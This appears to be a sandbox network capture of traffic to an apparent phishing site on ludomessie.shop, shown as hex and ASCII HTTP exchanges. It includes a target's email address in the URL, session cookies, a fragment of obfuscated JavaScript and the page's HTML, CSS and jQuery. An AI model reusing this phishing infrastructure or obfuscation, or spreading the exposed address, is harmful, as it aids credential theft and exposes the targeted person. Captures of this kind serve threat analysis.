2025-01-09 22:30:12 UTC	3928	IN	Data Raw: 66 35 31 0d 0a 31 39 30 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 30 78 31 38 32 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 30 78 31 38 37 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 30 78 31 36 39 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 30 78 31 38 36 29 29 2f 30 78 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 30 78 31 36 66 29 29 2f 30 78 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 30 78 31 37 64 29 29 2f 30 78 36 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 30 78 31 36 33 29 29 2f 30 78 37 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 62 37 64 65 63 28 Data Ascii: f51190=parseInt(_0x3b7dec(0x182))/0x1+parseInt(_0x3b7dec(0x187))/0x2(-parseInt(_0x3b7dec(0x169))/0x3)+-parseInt(_0x3b7dec(0x186))/0x4(-parseInt(_0x3b7dec(0x16f))/0x5)+-parseInt(_0x3b7dec(0x17d))/0x6*(parseInt(_0x3b7dec(0x163))/0x7)+parseInt(_0x3b7dec(

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:29 UTC	867	OUT	GET /?email=glalicker@hilcorp.com HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1
2025-01-09 22:30:30 UTC	517	IN	HTTP/1.1 302 Found Date: Thu, 09 Jan 2025 22:30:30 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: rt=dce3ee7580372d088fc5eba68266f598.htm; expires=Thu, 09-Jan-2025 22:35:30 GMT; Max-Age=300; path=/; HttpOnly Location: m/dce3ee7580372d088fc5eba68266f598.htm Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:30 UTC	918	OUT	GET /m/dce3ee7580372d088fc5eba68266f598.htm HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:30 UTC	357	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:30 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 22:30:30 UTC	7835	IN	Data Raw: 31 38 63 31 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 4c 49 45 34 5a 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 31 53 55 46 57 4a 4c 46 46 33 38 47 4b 57 55 31 32 34 42 41 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: 18c1<html dir="ltr" class="LIE4Z" lang="en"> <head> <title>1SUFWJLFF38GKWU124BA</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" />
2025-01-09 22:30:30 UTC	373	IN	Data Raw: 22 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 22 Data Ascii: ""></div> <div class=""></div> </div> <div class="" style="margin-bottom: 20px; display: flex; align-items: center;"
2025-01-09 22:30:30 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:30 UTC	5013	IN	Data Raw: 31 33 38 64 0d 0a 39 36 54 32 38 56 4b 58 48 46 38 31 52 37 57 49 48 30 49 39 4a 4b 38 31 33 22 20 73 74 79 6c 65 3d 22 6d 61 78 2d 68 65 69 67 68 74 3a 20 33 36 70 78 3b 22 20 61 6c 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 3c 64 69 76 20 69 64 3d 22 73 63 72 65 65 6e 31 22 3e 3c 64 69 76 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 Data Ascii: 138d96T28VKXHF81R7WIH0I9JK813" style="max-height: 36px;" alt="" /> </div> <div id="screen1"><div role="main"> <d
2025-01-09 22:30:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:31 UTC	724	OUT	GET /m/cxx/IX9HZ4SHDYP35GCKXCU0FK5LD HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:32 UTC	261	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:31 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/css; charset: UTF-8;charset=UTF-8
2025-01-09 22:30:32 UTC	6349	IN	Data Raw: 31 38 63 35 0d 0a 2a 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0d 0a 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0d 0a 2e 66 6f 72 6d 2d 67 72 6f 75 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 3b 7d 0d 0a 2e 63 5f 6c 6f 61 64 69 6e 67 44 6f 74 73 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 68 69 Data Ascii: 18c5{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}.form-group{margin-bottom:12px;}.c_loadingDots{line-height:0;whi
2025-01-09 22:30:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:31 UTC	723	OUT	GET /m/sm/YEGUW1WZ86VSGF4U8HGDSSDYB HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:32 UTC	261	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:31 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/css; charset: UTF-8;charset=UTF-8
2025-01-09 22:30:32 UTC	7931	IN	Data Raw: 33 65 38 30 0d 0a 68 74 6d 6c 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 20 7d 0d 0a 62 6f 64 79 20 7b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 7d 0d 0a 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 64 65 74 61 69 6c 73 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 69 67 75 72 65 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 61 69 6e 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61 72 79 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 7d 0d 0a 61 75 64 69 6f 2c 20 63 61 6e 76 61 73 2c 20 70 72 6f 67 72 65 73 73 2c 20 76 69 64 65 6f 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 Data Ascii: 3e80html { font-family: sans-serif; text-size-adjust: 100%; }body { margin: 0px; }article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block; }audio, canvas, progress, video { display: i
2025-01-09 22:30:32 UTC	75	IN	Data Raw: 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 36 32 35 72 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 2e 37 35 72 65 6d 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 30 2e 38 31 38 70 78 Data Ascii: ht: 400; font-size: 0.625rem; line-height: 0.75rem; padding-bottom: 0.818px
2025-01-09 22:30:32 UTC	8000	IN	Data Raw: 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 2e 38 31 38 70 78 3b 20 7d 0d 0a 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 20 68 36 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 20 7b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 20 65 6c 6c 69 70 73 69 73 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 38 35 32 32 35 72 65 6d 3b 20 7d 0d 0a 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 20 68 36 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 20 7b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 2e 36 30 32 32 35 72 65 6d 3b 20 7d 0d 0a 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c Data Ascii: ; padding-top: 0.818px; }.text-caption-alt.text-maxlines-1, h6.text-maxlines-1 { white-space: nowrap; text-overflow: ellipsis; max-height: 0.85225rem; }.text-caption-alt.text-maxlines-2, h6.text-maxlines-2 { max-height: 1.60225rem; }.text-caption-al
2025-01-09 22:30:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:32 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 73 65 74 2d 32 34 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 30 25 3b 20 7d 0d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 35 34 30 70 78 29 20 7b 0d 0a 20 20 2e 63 6f 6c 2d 73 6d 2d 31 2c 20 2e 63 6f 6c 2d 73 6d 2d 32 2c 20 2e 63 6f 6c 2d 73 6d 2d 33 2c 20 2e 63 6f 6c 2d 73 6d 2d 34 2c 20 2e 63 6f 6c 2d 73 6d 2d 35 2c 20 2e 63 6f 6c 2d 73 6d 2d 36 2c 20 2e 63 6f 6c 2d 73 6d 2d 37 2c 20 2e 63 6f 6c 2d 73 6d 2d 38 2c 20 2e 63 6f 6c 2d 73 6d 2d 39 2c 20 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 20 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 20 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 20 2e 63 6f 6c 2d 73 6d 2d 31 33 2c 20 2e 63 6f 6c 2d 73 6d 2d 31 34 2c 20 2e 63 6f 6c 2d 73 6d 2d 31 35 2c 20 2e 63 6f 6c 2d 73 6d 2d 31 36 2c 20 2e 63 6f 6c Data Ascii: 1f40set-24 { margin-left: 100%; }@media (min-width: 540px) { .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-13, .col-sm-14, .col-sm-15, .col-sm-16, .col
2025-01-09 22:30:32 UTC	7822	IN	Data Raw: 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 31 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 37 2e 35 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 32 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 39 31 2e 36 36 36 37 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 33 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 39 35 2e 38 33 33 33 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 34 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 30 25 3b 20 7d 0d 0a 7d 0d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 39 32 70 78 29 20 7b 0d 0a 20 20 2e 63 6f 6c 2d 6c 67 2d 31 2c 20 2e 63 6f 6c 2d 6c 67 2d 32 2c 20 2e 63 6f 6c 2d 6c 67 2d 33 2c 20 Data Ascii: } .col-md-offset-21 { margin-left: 87.5%; } .col-md-offset-22 { margin-left: 91.6667%; } .col-md-offset-23 { margin-left: 95.8333%; } .col-md-offset-24 { margin-left: 100%; }}@media (min-width: 992px) { .col-lg-1, .col-lg-2, .col-lg-3,
2025-01-09 22:30:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:32 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 30 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 31 2e 36 36 36 37 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 31 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 35 2e 38 33 33 33 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 32 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 30 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 33 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 34 2e 31 36 36 37 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 34 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 38 2e 33 33 33 33 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c Data Ascii: 1f40; } .col-xl-offset-10 { margin-left: 41.6667%; } .col-xl-offset-11 { margin-left: 45.8333%; } .col-xl-offset-12 { margin-left: 50%; } .col-xl-offset-13 { margin-left: 54.1667%; } .col-xl-offset-14 { margin-left: 58.3333%; } .col-xl
2025-01-09 22:30:32 UTC	7822	IN	Data Raw: 70 65 3d 22 72 61 64 69 6f 22 5d 2c 20 2e 63 68 65 63 6b 62 6f 78 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 20 2e 63 68 65 63 6b 62 6f 78 2d 69 6e 6c 69 6e 65 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 32 38 70 78 3b 20 7d 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 5b 64 69 73 61 62 6c 65 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 64 69 73 61 62 6c 65 64 2c 20 66 69 65 6c 64 73 65 74 5b 64 69 73 61 62 6c 65 64 5d 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d Data Ascii: pe="radio"], .checkbox input[type="checkbox"], .checkbox-inline input[type="checkbox"] { position: absolute; margin-left: -28px; }input[type="radio"][disabled], input[type="radio"].disabled, fieldset[disabled] input[type="radio"], input[type="checkbox"]
2025-01-09 22:30:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:31 UTC	709	OUT	GET /m/jx/I1DG3RMJL00LK2CD7OY4FD1R6 HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:32 UTC	268	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:31 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
2025-01-09 22:30:32 UTC	7924	IN	Data Raw: 33 65 32 37 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f Data Ascii: 3e27/! jQuery v3.7.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
2025-01-09 22:30:32 UTC	7993	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 66 65 28 65 2c 22 69 6e 70 75 74 22 29 7c 7c 66 65 28 65 2c 22 62 75 74 74 6f 6e 22 29 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e Data Ascii: function B(t){return function(e){return fe(e,"input")&&e.type===t}}function _(t){return function(e){return(fe(e,"input")\|\|fe(e,"button"))&&e.type===t}}function X(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.
2025-01-09 22:30:32 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:32 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 65 2e 6e 6f 64 65 54 79 70 65 3c 36 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 70 61 72 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 62 2e 70 73 65 75 64 6f 73 2e 65 6d 70 74 79 28 65 29 7d 2c 68 65 61 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 71 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7d 2c 69 6e 70 75 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7d 2c 62 75 74 74 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 Data Ascii: 1f40function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!b.pseudos.empty(e)},header:function(e){return q.test(e.nodeName)},input:function(e){return N.test(e.nodeName)},button:function(e){return fe
